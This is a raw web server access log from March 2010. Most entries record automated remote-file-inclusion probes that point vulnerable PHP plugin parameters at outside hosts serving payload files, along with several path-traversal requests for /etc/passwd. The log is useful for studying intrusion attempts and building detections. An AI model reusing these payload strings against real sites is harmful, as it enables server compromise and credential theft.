207.58.161.181 - - [19/Mar/2010:01:52:31 -0400] "GET /logs/error_log.Q109080900/errors.php?error=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:01:52:32 -0400] "GET /errors.php?error=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:01:52:33 -0400] "GET /logs/errors.php?error=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:01:52:33 -0400] "GET /logs/error_log.Q109080900/errors.php?error=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.188.212.35 - - [19/Mar/2010:01:54:10 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.188.212.35 - - [19/Mar/2010:01:54:10 -0400] "GET /logs/access_log.Q109051700%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.188.212.35 - - [19/Mar/2010:01:54:10 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.188.212.35 - - [19/Mar/2010:01:54:10 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:54:16 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:54:16 -0400] "GET /logs/access_log.Q110022500%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:54:16 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
119.235.237.19 - - [19/Mar/2010:01:54:12 -0400] "GET /logs/access_log.Q109052600 HTTP/1.1" 200 4651429 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
95.108.128.242 - - [19/Mar/2010:01:55:11 -0400] "GET /logs/error_log.Q109101900 HTTP/1.1" 200 3173298 "-" "Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.88 - - [19/Mar/2010:01:55:48 -0400] "GET /logs/access_log.Q110011100%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:05 -0400] "GET /logs/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:05 -0400] "GET /write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:05 -0400] "GET /logs/error_log.Q110020100/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:06 -0400] "GET /logs/error_log.Q110020100/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:06 -0400] "GET /logs/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:06 -0400] "GET /write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:48 -0400] "GET /logs/access_log.Q110030800/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:01:59:50 -0400] "GET /logs/access_log.Q110030800/write_comment_update.php?patch=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:00:14 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:00:14 -0400] "GET /logs/error_log.Q110030600%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:00:14 -0400] "GET /logs/access_log.Q110012100%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:00:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
193.136.242.3 - - [19/Mar/2010:02:01:00 -0400] "GET /logs/access_log.Q110022400/default.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.816"
193.136.242.3 - - [19/Mar/2010:02:01:00 -0400] "GET /logs/default.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.816"
193.136.242.3 - - [19/Mar/2010:02:01:00 -0400] "GET /default.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.816"
95.108.128.242 - - [19/Mar/2010:02:00:50 -0400] "GET /logs/error_log.Q109061500 HTTP/1.1" 200 2959056 "-" "Yandex/1.01.001 (compatible; Win16; I)"
193.136.242.3 - - [19/Mar/2010:02:01:33 -0400] "GET /logs/error_log.Q110022400/default.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.816"
204.202.2.23 - - [19/Mar/2010:02:01:45 -0400] "GET /logs/access_log.Q109080600//include/admin.lib.inc.php?site_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.202.2.23 - - [19/Mar/2010:02:01:49 -0400] "GET /logs/access_log.Q110030600//include/admin.lib.inc.php?site_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:02:02:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.188.212.35 - - [19/Mar/2010:02:02:36 -0400] "GET /logs/access_log.Q110020700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:02:05:56 -0400] "GET /logs/error_log.Q109110400 HTTP/1.0" 200 2627411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [19/Mar/2010:02:06:03 -0400] "GET /logs/error_log.Q109110400 HTTP/1.0" 200 2627411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [19/Mar/2010:02:06:11 -0400] "GET /logs/error_log.Q109110400 HTTP/1.0" 200 2627411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [19/Mar/2010:02:06:27 -0400] "GET /logs/error_log.Q110011200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
193.136.242.3 - - [19/Mar/2010:02:06:35 -0400] "GET /logs/error_log.Q110022400%20/default.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.816"
67.195.114.252 - - [19/Mar/2010:02:06:18 -0400] "GET /logs/error_log.Q109110400 HTTP/1.0" 200 2627411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.9.14.88 - - [19/Mar/2010:02:07:14 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:07:14 -0400] "GET /logs/access_log.Q109120700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:07:14 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:07:21 -0400] "GET /logs/access_log.Q110022400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:08:00 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:08:00 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:08:08 -0400] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:08:08 -0400] "GET /logs/access_log.Q110022400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.249.65.53 - - [19/Mar/2010:02:09:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3173E15F4A330000859F09T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.9.14.88 - - [19/Mar/2010:02:10:35 -0400] "GET //administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:35 -0400] "GET /logs//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:35 -0400] "GET /logs/error_log.Q110022000//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:35 -0400] "GET /logs/access_log.Q110022000//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:37 -0400] "GET /logs/access_log.Q109121200%20%20//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:37 -0400] "GET /logs//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:37 -0400] "GET //administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:38 -0400] "GET /logs//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:38 -0400] "GET /logs/access_log.Q109121200%20%20//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:10:38 -0400] "GET //administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:02:11:16 -0400] "GET /errors.php?error=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:02:11:16 -0400] "GET /logs/errors.php?error=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.232.237.122 - - [19/Mar/2010:02:11:16 -0400] "GET /logs/access_log.Q110022000%20%20/errors.php?error=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:11:25 -0400] "GET /logs//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:11:25 -0400] "GET /logs/error_log.Q110022000//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:11:25 -0400] "GET /logs/access_log.Q110022000//administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:02:11:25 -0400] "GET //administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:02:11:45 -0400] "GET /logs/access_log.Q109113000 HTTP/1.1" 200 4068743 "-" "Yandex/1.01.001 (compatible; Win16; I)"
118.129.170.49 - - [19/Mar/2010:02:12:50 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:12:51 -0400] "GET /logs/access_log.Q109100400%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:12:51 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:12:51 -0400] "GET /logs/access_log.Q109110900%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:13:00 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:13:00 -0400] "GET /logs/access_log.Q109100400%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:13:00 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:13:01 -0400] "GET /logs/access_log.Q109110900%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:02:12:38 -0400] "GET /logs/access_log.Q109121300 HTTP/1.0" 200 2562035 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.217.216.132 - - [19/Mar/2010:02:13:20 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:13:21 -0400] "GET /logs/access_log.Q109072800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:13:21 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:07 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:07 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:07 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:07 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:08 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:08 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:08 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:08 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:08 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:11 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:11 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:11 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:18 -0400] "GET //popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:14:18 -0400] "GET /logs//popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
204.202.2.23 - - [19/Mar/2010:02:14:48 -0400] "GET /logs/access_log.Q110020600//include/admin.lib.inc.php?site_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:40 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:40 -0400] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:40 -0400] "GET /logs/error_log.Q110022300%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:42 -0400] "GET /logs/error_log.Q110022300%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:42 -0400] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:42 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:47 -0400] "GET /logs/access_log.Q110021700%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.170.49 - - [19/Mar/2010:02:15:50 -0400] "GET /logs/access_log.Q110021700%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:02:16:20 -0400] "GET /logs/error_log.Q110010300 HTTP/1.0" 200 2626354 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.12.50.45 - - [19/Mar/2010:02:17:06 -0400] "GET /logs/access_log.Q109122800///main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.12.50.45 - - [19/Mar/2010:02:17:06 -0400] "GET /logs///main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.12.50.45 - - [19/Mar/2010:02:17:06 -0400] "GET ///main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.223 - - [19/Mar/2010:02:17:37 -0400] "GET //include/mail.inc.php?root=http://geo.metodist.ru/images/id? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
95.108.128.242 - - [19/Mar/2010:02:17:31 -0400] "GET /logs/error_log.Q109061700 HTTP/1.1" 200 2209496 "-" "Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [19/Mar/2010:02:19:29 -0400] "GET //popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:29 -0400] "GET /logs/error_log.Q110030400%20%20//popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:29 -0400] "GET /logs//popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:34 -0400] "GET //popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:34 -0400] "GET /logs//popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:34 -0400] "GET /logs/error_log.Q110030400%20%20//popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:40 -0400] "GET //popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:40 -0400] "GET /logs//popup_window.php?site_isp_root=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:45 -0400] "GET //popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:45 -0400] "GET /logs//popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:19:45 -0400] "GET /logs/error_log.Q110030400%20%20//popup_window.php?site_isp_root=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:19:46 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:19:46 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:19:46 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
119.235.237.92 - - [19/Mar/2010:02:20:00 -0400] "GET /logs/access_log.Q109102400 HTTP/1.1" 200 3521379 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
211.115.68.164 - - [19/Mar/2010:02:20:34 -0400] "GET /logs/access_log.Q109060200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
